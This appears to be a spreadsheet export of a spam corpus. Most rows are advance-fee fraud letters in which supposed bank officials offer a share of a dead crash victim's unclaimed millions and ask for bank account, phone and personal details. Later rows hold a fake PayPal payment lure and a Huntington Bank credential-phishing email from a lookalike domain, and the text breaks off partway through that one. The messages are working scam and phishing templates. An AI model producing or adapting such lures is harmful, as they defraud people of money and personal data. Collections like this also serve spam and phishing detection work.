    <t>FROM THE DESK OF MR.AHMED HASSANA\nTHE SENIOR AUDITOR INCHARGE\nFORIEGN REMITTANCE UNIT,\nBANK OF AFRICA (BOA).\nOUAGADOUGOU BURKINA FASO.\n\nDEAR FRIEND,\n\nI PRESUMED THAT ALL IS WELL WITH YOU AND YOUR FAMILY.PLEASE LET THIS NOT BE \nA SURPRISED MESSAGE TO YOU BECAUSE I GOT YOUR CONTACT INFORMATION FROM THE \nINTERNATIONAL DIRECTORY FEW WEEKS AGO BEFORE I DECIDED TO CONTACT YOU ON \nTHIS MAGNITUDE AND LUCRATIVE TRANSACTION FOR OUR PRESENT AND FUTURE SURVIVAL \nIN LIFE. MOREOVER,I HAVE LAID ALL THE SOLEMN TRUST IN YOU BEFORE I DECIDED \nTO DISCLOSE THIS SUCCSSFUL AND CONFIDENTIAL TRANSACTION TO YOU.\n\nI AM THE SENIOR AUDITOR INCHARGE OF FORIEGN REMITTANCE UNIT OF OUR BANK AND \nI DECIDED TO CONTACT YOU FOR THIS FINANCIAL TRANSACTION WORTH FOURTEEN \nMILLION FIVE HUNDRED THOUSAND US DOLLARS (14.5M) FOR OUR PRESENT AND FUTURE \nSUCCESS. THIS IS AN ABANDONED FUND THAT BELONGS TO ONE OF OUR BANK FORIEGN \nCUSTOMERS WHO DIED ALONG WITH HIS ENTIRE FAMILY THROUGH PLANE CRASH FEW \nYEARS AGO.\nMEANWHILE,I WAS VERY FORTUNATE TO COME ACCROSS THE DECEASED FILE WHEN I WAS \nARRANGING THE OLD AND ABANDONED CUSTOMERS FILE IN OTHER TO SIGN AND SUBMIT \nTO THE ENTIRE BANK MANAGEMENT FOR AN OFFICIAL RE DOCUMENTATION AND AUDIT OF \nTHE YEAR AGAINST 2006.\n\nINFORMED CLEARLY THAT IT WAS STATED IN OUR FORIEGN BANKING RULES AND \nREGULATIONS WHICH WAS SIGNED LAWFULLY THAT IF SUCH FUND REMAINS UNCLAIMED \nTILL THE PERIOD OF FOUR YEARS STARTED FROM THE DATE THE BENEFICIARY DIED, \nTHE MONEY WILL BE TRANSFERRED INTO THE TREASURY AS UNCLAIMED FUNDHOWEVER, IT \nIS NOT AUTHORIZES BY THE RULES GUIDING OUR BANK FOR A CITIZEN OF BURKINA \nFASO TO MAKE THE CLAIM OF THE FUND UNLESS YOU ARE A FORIEGNER NO MATTER THE \nCOUNTRY.\n\nSO THE REQUEST OF YOU AS A FORIEGNER IS NECESSARY TO APPLY FOR THE CLAIM AND \nTRANSFER OF THE FUND SMOOTHLY INTO YOUR RELIABLE BANK ACCOUNT AS THE NEXT OF \nKIN TO THE DECEASED.WHEN THE FUND IS TRANSFERRED INTO YOUR ACCOUNT 35% WILL \nBE FOR YOU IN RESPECT OF ALL YOUR ASSISTANCE FOR THE TRANSFER OF THE FUND \nINTO YOUR ACCOUNT AND PROVISION OF THE BANK ACCOUNT WHERE THE BANK WILL \nREMIT THE FUND, 60% WILL BE FOR ME BEING THE PIONEER OF THE BUSINESS WHILE \nTHE REST 5% WILL BE SHARED TO RESPECTABLE ORGANISATIONS SUCH AS CHARITY AND \nTHE DESTITUDES HOMES ARROUND US IN THE WORLD.\n\nIF YOU ARE REALLY SURE OF YOUR TRUSTWORTHINESS,ACCOUNTABILITY AND \nCONFIDENTIALITY ON THIS TRANSACTION, CONTACT ME AND ACCEPT NOT TO CHANGE \nYOUR MIND TO CHEAT OR DISAPPOINT ME WHEN THE FUND IS TRANSFERRED INTO YOUR \nACCOUNT.SO REPLY FOR THE ASSURANCE WITH YOUR TELEPHONE AND FAX NUMBERS TO \nFACILITATE EASY COMMUNICATION. AS SOON AS YOU REPLY, YOU NOTIFY ME SO THAT I \nWILL LET YOU KNOW THE NEXT STEP AND PROCEDURE TO FOLLOW IN ORDER TO FINALIZE \nTHIS TRANSACTION SUCCESSFULLY.\n\nI EXPECT YOUR URGENT COMMUNICATION.\nYOURS SINCERELY,\nMR AHMED HASSANA\n\n_________________________________________________________________\nMSN Messenger : appels gratuits de PC  PC ! \n[URL]http://www.msn.fr[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>2948</t>
  </si>
  <si>
    <t>To: nan\nFrom: mussa ali &lt;djemafarid18@hotmail.com&gt;\nDate: Thu, 08 Mar 2007 00:44:12 +0000</t>
  </si>
  <si>
    <t>Thu, 08 Mar 2007 00:44:12 +0000</t>
  </si>
  <si>
    <t>mussa ali &lt;djemafarid18@hotmail.com&gt;</t>
  </si>
  <si>
    <t>Dear Friend,\n\nI am Mr jema farid, the director in charge of auditing and accounting\nsection of Bank Of Africa,Ouagadougou Burkina faso West Africa with\ndue respect and regard.I have decided to contact you on a business\ntransaction that will be very beneficial to both of us at the end of the\ntransaction.\n\nDuring our investigation and auditing in this bank , my department came\nacross a very hugesum of money belonging to a aperson who died on\nJuly 2003 in a plane crash and the fund has been dormant in his account with\nthis Bank with out any claim of the fund in our custody either from his\nfamily or relation before our discovery to this developement.\n\nThe said amount was EIGHTHEEN MILLION united states dollars.($18.000.000)\nMeanwhile all the whole arrangement to put the claim over this fund as the\nbonafide next of kin to the deceased;get the required approval and transfer\nthis money to a foriegn account has been put in place and directives and\nneeded information will be relayed to you as soon as you indicate your\ninterest and willingness to assist us and also benefit your self to this\ngreat business opportunity.Infact i could have done this deal alone but\nbecause of my position in this country as a civiassist(A Banker),we are not\nallowed to operate a foriegn account and wouldeventually raise an eye brow\non my side during the great business opportunity.Infact i could have done\nthis deal alone but because of my position in this country as a civiassist(A\nBanker),we are not allowed to operate a foriegn account and wouldeventually\nraise an eye brow on my side during the time of transfer becuase i work it\nmay be after due verification and assist by the correspondent branch of the\nbank where the money will be remitted from to your own designation bank\naccount.\n\nI will not fail to inform you that this transaction is 100% risk free.On\nsmooth conclusion of this transaction,you will be entitled to 40%of the\ntotal sum as gratification, while 5% will be set aside to take care of\nexpenses that may arise during the time of transfer and also telephone\nbills; while 60% will be for me. Please;you have been adviced to keep top\nsecret as i am still in service and intend to retire from service after we\nconclude this deal with you.\n\nI will be monitoring the whole situation here in this bank until you confirm\nthe money in your account and ask me to come down to your country for\nsubsequent sharing of the fund according to percentages previously indicated\nand further investment,either in your country or any country you advice us\nto invest.All other necessary vital information will be sent to you when i\nhear from you.\nYours faithfully\n\n_________________________________________________________________\nTestez Windows Llive Mail Beta ! \n[URL]http://www.msn.fr[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>2947</t>
  </si>
  <si>
    <t>To: nan\nFrom: djema farid &lt;djemafarid09@hotmail.com&gt;\nDate: Thu, 08 Mar 2007 00:23:06 +0000</t>
  </si>
  <si>
    <t>Thu, 08 Mar 2007 00:23:06 +0000</t>
  </si>
  <si>
    <t>djema farid &lt;djemafarid09@hotmail.com&gt;</t>
  </si>
  <si>
    <t>Dear Friend,\n\nI am Mr djema farid, the director in charge of auditing and accounting\nsection of Bank Of Africa,Ouagadougou Burkina faso West Africa with\ndue respect and regard.I have decided to contact you on a business\ntransaction that will be very beneficial to both of us at the end of the\ntransaction.\n\nDuring our investigation and auditing in this bank , my department came\nacross a very hugesum of money belonging to a aperson who died on\nJuly 2003 in a plane crash and the fund has been dormant in his account with\nthis Bank with out any claim of the fund in our custody either from his\nfamily or relation before our discovery to this developement.\n\nThe said amount was EIGHTHEEN MILLION united states dollars.($18.000.000)\nMeanwhile all the whole arrangement to put the claim over this fund as the\nbonafide next of kin to the deceased;get the required approval and transfer\nthis money to a foriegn account has been put in place and directives and\nneeded information will be relayed to you as soon as you indicate your\ninterest and willingness to assist us and also benefit your self to this\ngreat business opportunity.Infact i could have done this deal alone but\nbecause of my position in this country as a civiassist(A Banker),we are not\nallowed to operate a foriegn account and wouldeventually raise an eye brow\non my side during the great business opportunity.Infact i could have done\nthis deal alone but because of my position in this country as a civiassist(A\nBanker),we are not allowed to operate a foriegn account and wouldeventually\nraise an eye brow on my side during the time of transfer becuase i work it\nmay be after due verification and assist by the correspondent branch of the\nbank where the money will be remitted from to your own designation bank\naccount.\n\nI will not fail to inform you that this transaction is 100% risk free.On\nsmooth conclusion of this transaction,you will be entitled to 40%of the\ntotal sum as gratification, while 5% will be set aside to take care of\nexpenses that may arise during the time of transfer and also telephone\nbills; while 60% will be for me. Please;you have been adviced to keep top\nsecret as i am still in service and intend to retire from service after we\nconclude this deal with you.\n\nI will be monitoring the whole situation here in this bank until you confirm\nthe money in your account and ask me to come down to your country for\nsubsequent sharing of the fund according to percentages previously indicated\nand further investment,either in your country or any country you advice us\nto invest.All other necessary vital information will be sent to you when i\nhear from you.\nYours faithfully\n\n_________________________________________________________________\nTestez Windows Live Mail Beta ! [URL]http://www.ideas.live.com[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>2191</t>
  </si>
  <si>
    <t>To: nan\nFrom: ALI IBRAHIM &lt;dr_ali_i1@hotmail.com&gt;\nDate: Thu, 08 Jun 2006 18:19:22 +0000</t>
  </si>
  <si>
    <t>Thu, 08 Jun 2006 18:19:22 +0000</t>
  </si>
  <si>
    <t>ALI IBRAHIM &lt;dr_ali_i1@hotmail.com&gt;</t>
  </si>
  <si>
    <t>TREAT AS URGENT AND CONFIDENTIAL  FROM DR ALI IBRAHIM.</t>
  </si>
  <si>
    <t>FROM THE DESK OF DR ALI IBRAHIM.\nBILL AND EXCHANGE MANAGER,\nAFRICAN DEVELOPMENT BANK -ADB ANNEX.\nOUAGADOUGOU, BURKINA FASO.\nIN WEST AFRICA.\n\n\n\n\nPRIVATE CONFIDENTIAL NUMBER E-MAIL:dr_ ali_i1@hotmail.com\n\nDear Sir,\n\n\n\nI am The Manager of Bill and Exchange at the Foreign Remittance Department \nof African Development bank(ADB).  I am writing following the impressive \ninformation about you through one of my friends who runs a consultancy firm \nin my country. He assured me of your capability and reliability to champion \nthis businees opportunity.\n\nIn my department we discovered an abandoned sum of $ 30m US dollars ( Thirty \nmillion US dollars) . In an account that belongs to one of our foreign \ncustomer who died along with his entire family in november 2001 in a plane \ncrash.\n\nSince we got information about his death, we have been expecting his next of \nkin to come over and claim his money because we cannot release it unless \nsomebody applies for it as next of kin or relation to the deceased as \nindicated in our banking guidelines but unfortunately we learnt that all his \nsupposed next of kin   or relation died alongside with him at the plane \ncrash leaving nobody behind for the claim. It is therefore upon this \ndiscovery that I and other officials in my department now decided to make \nthis businness proposal to you and release the money to you as the next of \nkin or relation to the deceased for safety and subsequent disbursement since \nnobody is coming for it and we dont want this money to go into the Bank \ntreasury as unclaimed Bill.\n\nThe Banking law and guideline here stipulates that if such money remained \nunclamed after six years, the money will be transfered into the Bank \ntreasury as unclaimed fund.\n\nThe request of  foreigner as next of kin in this business is occasioned by \nthe fact that the customer was a foreigner and a Burkinabe cannot stand as \nnext of kin to a foreigner.\n\nWe agree that 30 % of this money will be for you as foreign partner, in\nrespect to the provision of a foreign account,  10 % will be set aside for \nexpenses incured during the business and 60 % would be for ;me and my \ncolleagues. There after I and my colleagues will visit your country for \ndisbursement accoding to the percentages indicated.\n\nTherefore to enable the immediate trnansfer of this fund to you as arranged, \nyou must apply first to the bank as relations or next of kin of the deceased \nindicating your bank name, your bank account number, your private telephone \nand fax number for easy and effective communication and location where in \nthe money will be remitted .\n\nUpon receipt of your reply, I will send to you by fax or email the text of \nthe application. I will not fail to bring to your notice that this \ntransaction  is hitch free and that you should not entertain any atom of \nfear as all required arrangements have been made for the transfer .\n\nYou should contact me immediately as soon as you receive this letter.\nTrusting to hear from you immediately.\n\nYours faithfully,\n\nDR ALI IBRAHIM.\nBill and Exchange Manager,\nAfrican Development Bank ADB .\n\n_________________________________________________________________\nExpress yourself instantly with MSN Messenger! Download today it's FREE! \n[URL]http://messenger.msn.click-url.com[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>2190</t>
  </si>
  <si>
    <t>To: nan\nFrom: Brooks Brooks &lt;dbrooks97@hotmail.com&gt;\nDate: Thu, 08 Jun 2006 15:27:44 +0000</t>
  </si>
  <si>
    <t>Thu, 08 Jun 2006 15:27:44 +0000</t>
  </si>
  <si>
    <t>Brooks Brooks &lt;dbrooks97@hotmail.com&gt;</t>
  </si>
  <si>
    <t>From Mr.Donald</t>
  </si>
  <si>
    <t>Foreign Payment Liaison Office,\nSecond Avenue, Seattle Washington\nWA, 98104, U.S.A\nSecurity Tel/Fax No: 1-610-980-8687\n\nDear Friend,\n\nRE; SWIFT/TELEGRAPHIC TRANSFER OF US$11,400,000.00 (ELEVEN MILLION,FOUR \nHUNDRED THOUSAND UNITED STATES DOLLARS) TO YOUR BANK ACCOUNT,THROUGH THE \nFEDERAL RESERVE BANK NEW-YORK.\n\nFollowing the September 11th terrorist attacks on United States World Trade \nCenter which slumped the New York Stock Exchange (NYSE) and the office of \nthe comptroller of the currency (OCC) Washington DC, the Accountant General \nForeign Payment Liaison office recently carried out Verifications and \nauditing exercise on foreign payment, these funds was discovered during this \nprocess.\n\nI am Mr.Brooks Donald, the Internal Auditor Foreign payment office Seattle \nbranch, Washington. I got your contact through the World Trade Encyclopaedia \nand wish to express my willingness to transfer an overdue payment of \nUS$11,400,000.00 (Eleven million, four hundred thousand United States \nDollars only) to your nominated bank account, through the Federal Reserve \nBank of New York. However, concrete arrangements have been concluded \nsuccessfully for the transfer.These funds will be released to you as if you \nare a share-holder at the New-York Stock Exchange.\n\nThese funds emanated from over invoiced payment including logistic and Y2K \ncompliance with our programs networking.Some of these funds actually belongs \nto the late Morris Thompson, who died during the Alaska Airlines Flight 261 \nwhich crashed on January 31 2000, including his wife and only daughter. You \nshall read more about the crash on visiting this website\n\n[URL]http://www.cnn.com[/URL]\n\nI discovered this amount from the manifest recently and secured a payment \nauthority to authenticate the transfer.Note that you will be entitled to \nshare 15% of the funds. This deal is 100% covered from any form of inquiry, \nand it will be done under a legitimate funds transfer process.\n\nKindly send the following information urgently, (1), your full name and \naddress, (2) your confidential Telephone and Fax number. You will open a new \nbank account where these funds will be remitted. Finally, note that a high \nDegree of trust is required from both parties.\n\nLooking forward to your timely response via confidential security E-mail; \nbrooksdon97@hotmail.com Make sure you contact me through my email address \nbefore sending me a fax or phone call, this is my TEL/FAX:1 610-980-8687\n\nYour urgent reply is highly anticipated.\n\nDonald.\n\n_________________________________________________________________\nAcepta el reto MSN Premium: Protección para tus hijos en internet. \nDescárgalo y pruébalo 2 meses gratis. \n[URL]http://join.msn.com[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>http://www.cnn.com http://join.msn.com</t>
  </si>
  <si>
    <t>2187</t>
  </si>
  <si>
    <t>To: musa_sani00@latinmail.com &lt;musa_sani00@latinmail.com&gt;\nFrom: musa sani &lt;musa_sani00@latinmail.com&gt;\nDate: Thu, 08 Jun 2006 10:14:54 +0200</t>
  </si>
  <si>
    <t>Thu, 08 Jun 2006 10:14:54 +0200</t>
  </si>
  <si>
    <t>musa sani &lt;musa_sani00@latinmail.com&gt;</t>
  </si>
  <si>
    <t>musa_sani00@latinmail.com &lt;musa_sani00@latinmail.com&gt;</t>
  </si>
  <si>
    <t>FROM THE DESK OF : MR MUSA SANI</t>
  </si>
  <si>
    <t>FROM THE DESK OF : MR MUSA SANI\nAUDITING AND ACCOUNTING SECTION, \nAFRICAN DEVLOPMENT BANK ( A.D.B ) \nOUAGADOUGOU BURKINA-FASO,WEST AFRICA. \n\nATTENTION PLEASE:\n\n \nI AM MR MUSA SANI THE DIRECTOR IN CHARGE OF AUDITING AND ACCOUNTING SECTION OF AFRICAN DEVELOPMENT BANK (A.D.B) OUAGADOUGOU BURKINA-FASO WEST AFRICA.\n\n\n\n WITH DUE RESPECT AND REGARD. I HAVE DECIDED TO CONTACT YOU ON A BUSINESS TRANSACTION THAT WILL BE VERY BENEFICIAL TO BOTH OF US AT THE END OF THE TRANSACTION .\n\n\n\n DURING OUR INVESTIGATION AND AUDITING IN THIS BANK, MY DEPARTMENT CAME ACROSS A VERY HUGE SUM OF MONEY BELONGING TO A DECEASED PERSON WHO DIED IN A PLANE CRASH AND THE FUND HAS BEEN DORMANT IN HIS ACCOUNT WITH THIS BANK WITHOUT ANY CLAIM OF THE FUND IN OUR CUSTODY EITHER FROM HIS FAMILY OR RELATION BEFORE OUR DISCOVERY TO THIS DEVELOPMENT. \n\n\n\nTHE SAID AMOUNT WAS (U.S 22.85M DOLLARS). \n\nAS IT MAY INTEREST YOU TO KNOW, I GOT YOUR IMPRESSIVE INFORMATION THROUGH INTERNET DIRECTORY .  MEANWHILE ALL THE WHOLE ARRANGEMENT TO PUT CLAIM OVER THIS FUND AS THE BONAFIDE NEXT OF KIN TO THE DECEASED, GET THE REQUIRED APPROVAL AND TRANSFER THIS MONEY TO A FOREIGN ACCOUNT HAS BEEN PUT IN PLACE AND DIRECTIVES AND NEEDED INFORMATION WILL BE RELAYED TO YOU AS SOON AS YOU INDICATE YOUR INTEREST AND WILLINGNESS TO ASSIST, AND ALSO BENEFIT YOUR SELF TO THIS GREAT BUSINESS OPPORTUNITY.  IN FACT I COULD HAVE DONE THIS DEAL ALONE BUT BECAUSE OF MY POSITION IN THIS COUNTRY AS A CIVIL SERVANT (A BANKER),WE ARE NOT ALLOWED TO OPERATE A FOREIGN ACCOUNT AND WOULD EVENTUALLY RAISE AN EYE BROW ON MY SIDE DURING THE TIME OF TRANSFER BECAUSE I WORK IN THIS BANK.\n\n\n\n THIS IS THE ACTUAL REASON WHY IT WILL REQUIRE A SECOND PARTY OR FELLOW WHO WILL FORWARD CLAIMS AS THE NEXT OF KIN WITH AFFIDAVIT OF TRUST OF OATH TO THE BANK AND ALSO PRESENT A FOREIGN ACCOUNT WHERE HE WILL NEED THE MONEY TO BE RE-TRANSFERRED INTO ON HIS REQUEST AS IT MAY BE AFTER DUE VERIFICATION AND CLARIFICATION BY THE CORRESPONDENT BRANCH OF THE BANK WHERE THE WHOLE MONEY WILL BE REMITTED FROM TO YOUR OWN DESIGNATION BANK ACCOUNT.\n\n I WILL NOT FAIL TO INFORM YOU THAT THIS TRANSACTION IS 100% RISK FREE. ON SMOOTH CONCLUSION OF THIS TRANSACTION, YOU WILL BE ENTITLED TO 30% OF THE TOTAL SUM AS GRATIFICATION, WHILE 10% WILL BE SET ASIDE TO TAKE CARE OF EXPENSES THAT MAY ARISE DURING THE TIME OF TRANSFER AND ALSO TELEPHONE AND INTERNET BILLS, WHILE 60% WILL BE FOR ME AND MY COLEAGUES.\n\n\n\n PLEASE, YOU HAVE BEEN ADVICED TO KEEP "TOP SECRET" AS I AM STILL IN SERVICE AND INTEND TO RETIRE FROM SERVICE AFTER WE CONCLUDE THIS DEAL WITH YOU.  I WILL BE MONITORING THE WHOLE SITUATION HERE IN THIS BANK UNTIL YOU CONFIRM THE MONEY IN YOUR ACCOUNT AND ASK ME TO COME DOWN TO YOUR COUNTRY FOR SUBSEQUENT SHARING OF THE FUND ACCORDING TO PERCENTAGES PREVIOUSLY INDICATED AND FURTHER INVESTMENT, EITHER IN YOUR COUNTRY OR ANY COUNTRY YOU ADVICE US TO INVEST IN.  ALL OTHER NECESSARY VITAL \n\n \nI NFORMATION WILL BE SENT TO YOU WHEN I HEAR FROM YOU.\nI LOOK FORWARD TO RECEIVE YOUR PHONE AND FAX NUMBERS FOR EASY COMMUNICATION,  YOURS FAITHFULLY, \n(MR MUSA SANI  22676086692)\n\n\n\n¡Miles de amigos con tus mismas aficiones! [URL]http://www.latinchat.com[/URL]</t>
  </si>
  <si>
    <t>532</t>
  </si>
  <si>
    <t>To: nan\nFrom: mngomeni james &lt;mngomeni4@fsmail.net&gt;\nDate: Thu, 08 Jan 2004 12:11:06 +0100</t>
  </si>
  <si>
    <t>Thu, 08 Jan 2004 12:11:06 +0100</t>
  </si>
  <si>
    <t>mngomeni james &lt;mngomeni4@fsmail.net&gt;</t>
  </si>
  <si>
    <t>investment Relationship</t>
  </si>
  <si>
    <t>TENDER COMMITTEE\nDEPARTMENT OF MINERALS AND ENERGY,\nPRETORIA, SOUTH AFRICA.\n \nDear Friend,\n It is my great pleasure in writing you this letter on behalf of my colleagues. Your information was given to me by a member of the South African Export Promotion Council (SAEPC) who was with the Federal Government delegation on a trip to your country for a bilateral conference talk to encourage foreign investors. I have decided to seek a\nconfidential co-operation with you in the execution of the deal described\nhere under for the benefit of all parties and hope you will keep it confidential because of the nature of this business\nWithin the Department of Minerals an Energy where I work as a Director of Audit and Project Implementation and with the co-operation of two other top officials, we have in our possession as overdue\npayment in US funds.\n The said funds represent certain percentage of the total contract value executed on behalf of my Department by a foreign\ncontracting firm which we the officials over-invoiced to the amount of US$14.500,000.00Dollars.Though the actual contract cost has been paid to the original contractor, leaving the excess balance unclaimed.\n Since the present elected Government is determined to pay foreign contractors all debts owed so as to maintain good relationship with foreign government and non-government agencies, we include our bills for approvals with the Department of Finance and the Reserve Bank of South Africa. We are seeking your assistance to front as beneficiary of the unclaimed funds, since we are not allowed to operate foreign accounts. Details and change of beneficiary information upon application for claim to reflect payment and approvals will be secured on behalf of You/your Company.\n  I have the authority of my partners involved to propose that should you be willing to assist us in this transaction your share as compensation will be US$3.625m (25%), while my colleagues and I receive US$9.425m  (65%) and the balance of US$1.450m (10%) for taxation and miscellaneous expenses incurred.\n The business itself is 100% safe and secure, provided you treat it with utmost confidentiality. It does not matter whether You/your Company does contract projects, as a transfer of powers will be secured in favor of You/your Company. Also your area of specialization is not a hindrance to the successful execution of this transaction. I have reposed\nmy confidence in you and hope that you will not disappoint me.\n Kindly notify me for further details upon your acceptance of this proposal\nmngomenijames@yahoo.co.uk\nThanks for your co-operation.\n\n Regards,\nMNGOMENI JAMES(DR)\nFreeserve AnyTime - HALF PRICE for the first 3 months - Save £7.50 a month \n[URL]www.freeserve.com[/URL]</t>
  </si>
  <si>
    <t>531</t>
  </si>
  <si>
    <t>To: nze_moore@voila.fr\nFrom: nze_moore &lt;nze_moore@voila.fr&gt;\nDate: Thu, 08 Jan 2004 03:22:46 +0100</t>
  </si>
  <si>
    <t>Thu, 08 Jan 2004 03:22:46 +0100</t>
  </si>
  <si>
    <t>nze_moore &lt;nze_moore@voila.fr&gt;</t>
  </si>
  <si>
    <t>nze_moore@voila.fr</t>
  </si>
  <si>
    <t>GOOD  DAY</t>
  </si>
  <si>
    <t>Attn my friend, \n\nWith due respect and huminity I propose this to you. I \nwrote to you last \ntime no response and I decided to write you again. \n\nI am Mr.Nze Moore from Arab Bank Plc,Benin Rep. During the \ncourse of our \nauditing we discovered the sum of (USD$9.7m) floating in an \naccount opened \nin this Bank since 1996 and as from 1999 nobody has \noperated on this account \nagain, and after going through some old files in the \nrecords I discovered \nthat the owner of the account died without a [HEIRE] on oct \n31 1999 by \nplane crash, Egyptair flight 990, \n([URL]http://www.cnn.com[/URL] the \nmoney is \nfloating. \nAfter due verification I noticed that no other person knows \nabout this \naccount except his wife who \nwas also invovled in the crash, and the account has no \nother beneficiary and \nmy investigation proved to me as well that until his death \nhe was the \nDirector GOLD ARK [SARL] \n\nSince our Bank Arab Bank Plc Benin rep. got information \nabout his death, we \nhave been expecting his next of kin to come forward and \nclaim his money \nbecause we cannot release it unless somebody \napplies for it as next of kin or relation to the deceased \nas indicated in \nour banking guidelines and policies but up to date nobody \ncame up to this \nbank as his next of kin or relative. It is therefore upon \nthis discovery \nthat I and other officials in my department now decided to \nmake this \nbusinness proposal to you and release the money to you as \nthe next of kin or \nrelation to the deceased for safety and subsequent \ndisbursement since nobody \nis coming forth and we don't want this money to go into the \nBank treasury as \nunclaimed Bill. \n\nOn this note, I decided to seek for whom his name shall be \nused as the next \nof kin as no one has come up as his relation. And the \ncountry law here does \nnot allow such money to stay more than Five years, for the \nmoney will be \nrecalled to the government treasury as unclaimed after this \nperiod. \nUpon the receipt of your response, I will send to you the \napplication form, \nbank's contact and the next step to take. I will not fail \nto bring to your \nnotice that this business is hitch free and that you should \nnot \nentertain any fear as all modalities for fund transfer can \nbe finalized \nwithin five banking days, after you apply to the bank as a \nrelation to the \ndeceased. \n\nWhen you receive this letter, kindly send me an e-mail \nsignifying your \ndecision.Including your private \nTel/Fax numbers for quick communication. I will be very \nhappy if you can \ntreat this business with the \nutmost secrecy it demands because of my position in this \nbank. \nHoping for a very successful business relationship with \nyou. \nRespectfully submitted, \n\nMr Nze Moore. ALTHENTIVE EMAIL.nze_moore@wp.pl. \nTel:00229601483. \n\n\n------------------------------------------\n\nFaites un voeu et puis Voila ! [URL]www.voila.fr[/URL] \n\n\n\n</t>
  </si>
  <si>
    <t>http://www.cnn.com www.voila.fr</t>
  </si>
  <si>
    <t>416</t>
  </si>
  <si>
    <t>To: jose@monkey.org\nFrom: "Nicole" &lt;info@pxsend.com&gt;\nDate: Thu, 08 Dec 2016 12:10:44 -0500</t>
  </si>
  <si>
    <t>Thu, 08 Dec 2016 12:10:44 -0500</t>
  </si>
  <si>
    <t>"Nicole" &lt;info@pxsend.com&gt;</t>
  </si>
  <si>
    <t>PayPal Funds Available</t>
  </si>
  <si>
    <t>Hi,  Please note you have a pending PayPal payment [[URL]http://pxsend.com[/URL]].  Sender has been verified and funds are available for use.  Access your pending funds transfer here [[URL]http://pxsend.com[/URL]]  The link above will expire soon.  Regards,  - Support  ----- Click this link to unsubscribe: [URL]http://pxsend.com[/URL] Hi,  Please note you have a pending PayPal payment.  Sender has been verified and funds are available for use.  Access your pending funds transfer here  The link above will expire soon.  Regards,  - Support         ----- Click here to unsubscribe</t>
  </si>
  <si>
    <t>http://pxsend.com http://pxsend.com http://pxsend.com</t>
  </si>
  <si>
    <t>1656</t>
  </si>
  <si>
    <t>To: nan\nFrom: Mr. Nelson Mba &lt;nelsonmba@ibatam.com&gt;\nDate: Thu, 08 Dec 2005 01:27:33 +0700</t>
  </si>
  <si>
    <t>Thu, 08 Dec 2005 01:27:33 +0700</t>
  </si>
  <si>
    <t>Mr. Nelson Mba &lt;nelsonmba@ibatam.com&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">INVITATION TO ACT AS NEXT OF KIN </t>
  </si>
  <si>
    <t>Mr.nelson mba. First Atlantic Bank PLC 4/6 Adetokunbo Ademola Street P. O. Box 75369 Victoria Island, Lagos-Nigeria website:  I Am Mr.nelson mba, in charge of bills and foreign exchange remittance Department of First Atlantic Bank Plc. I am writing you this letter to ask for your support and co-operation to carry out this business opportunity in my department. We discovered an unclaimed sum of $24.5Million (Twenty-four million five hundred thousand dollars) in an account belonging to one of our customer,(Mr.Kurt Kahle. Age 51) who died in a plane crash (Concorde Airlines Flight AF4590)with his 37-year-old wife and son Michael, aged eight. on Monday, 31 July, 2000, 13:22 GMT 14:22 UK Please view this site and read it's content carefully. [URL]http://news.bbc.co.uk[/URL] Since we got information about his death we have been expecting his next of kin to come over and claim his money. Unfortunately,neither the family nor the relation has appeared to claim this money. We cannot release this money unless somebody applies as the next of kin or relation to the deceased. Our banking guidelines indicated that if such money remained unclaimed for a period of Six (6) years, it would be transferred into the First Atlantic Bank Treasury as unclaimed fund. Another officer and I in the department now decided to transfer this money into your account as the next of kin or relation of the deceased for easy collection since nobody is coming for it and we dont want this money to go back into the bank treasury as an unclaimed fund. Infact it is my friend that advised me to urgently arrange to transfer out this money through another foreign beneficiary outside the country.Upon your acceptance to this proposal,we have also agreed on a sharing Ration: 1.30% for you as the account owner 2.60% for I and my colleagues 3.10% will be set aside to defray all incidental expenses both locally and internationally during the cause of this transaction. Furthermore we shall be coming over to your country when the money is finanlly in your account and we shall be relying on your advise as regards,to investment of our share,be informed that this transaction is genuine and 100% risk free considering the top level bank officials involved. As you know that I enjoy good office here with the bank and I will use my personality to make the official application on your behalf for approval of this money into your nominated account thereby having the banktransfer this money into your bank account. I will advice that you furnish me with the necessary details for me to make the official application of claim on your behalf as the next of kin and beneficiary of this money with out wasting time Here are the details I will need to make the application. (1)Your Full Name. (2)Your Contact Address. (3)Bank Name &amp; Address (4)Your phone &amp; Fax Number for effective communication. (5)Age, Religion &amp; Occupation. This is to effect the swift transfer of this fund into your account in less than (7) working days. Waiting for your urgent response Regards, Mr nelson mba. PLS REPLY TO (nelson_mba@excite.com)</t>
  </si>
  <si>
    <t>1065</t>
  </si>
  <si>
    <t>To: jose@monkey.org\nFrom: Huntington Bank &lt;noreply@huntinton.com&gt;\nDate: Thu, 08 Aug 2019 05:37:59 +0000 (UTC)</t>
  </si>
  <si>
    <t>Thu, 08 Aug 2019 05:37:59 +0000 (UTC)</t>
  </si>
  <si>
    <t>Huntington Bank &lt;noreply@huntinton.com&gt;</t>
  </si>
  <si>
    <t>You've been locked out</t>
  </si>
  <si>
    <t>- This mail is in HTML. Some elements may be ommited in plain text. - Dear Customer, We hope you're having a great day, we noticed an inconsistency in your huntington account, To further protect you, we've locked your account and restricted all access and activities on this account. To lift this restriction We need to verify some of your personal details and match it against what we have in our database, kindly follow the link below to commence this process. It will only take you about three minutes to complete this process. Investment, Insurance and Trust products are: NOT A DEPOSIT ? NOT FDIC INSURED ? NOT GUARANTEED BY THE BANK ? NOT INSURED BY ANY FEDERAL GOVERNMENT AGENCY ? MAY LOSE VALUE The Huntington National Bank is an Equal Housing Lender and Member FDIC. The Huntington logo, Huntington,The Huntington logoHuntington.Welcome. and Huntington Heads Up are federally registered service marks of Huntington Bancshares Incorporated.  2019 Huntington Bancshares Incorporated. [URL]https://u9218105.ct.sendgrid.net[/URL]   Dear Customer,  We hope you're having a great day, we noticed an inconsistency in your huntington account, To further protect you, we've locked your account and restricted all access and activities on this account.  To lift this restriction We need to verify some of your personal details and match it against what we have in our database, kindly follow the link below to commence this process.  It will only take you about three minutes to complete this process.    Investment, Insurance and Trust products are: NOT A DEPOSIT  NOT FDIC INSURED  NOT GUARANTEED BY THE BANK  NOT INSURED BY ANY FEDERAL GOVERNMENT AGENCY  MAY LOSE VALUE  The Huntington National Bank is an Equal Housing Lender and Member FDIC. The Huntington logo, Huntington,The Huntington 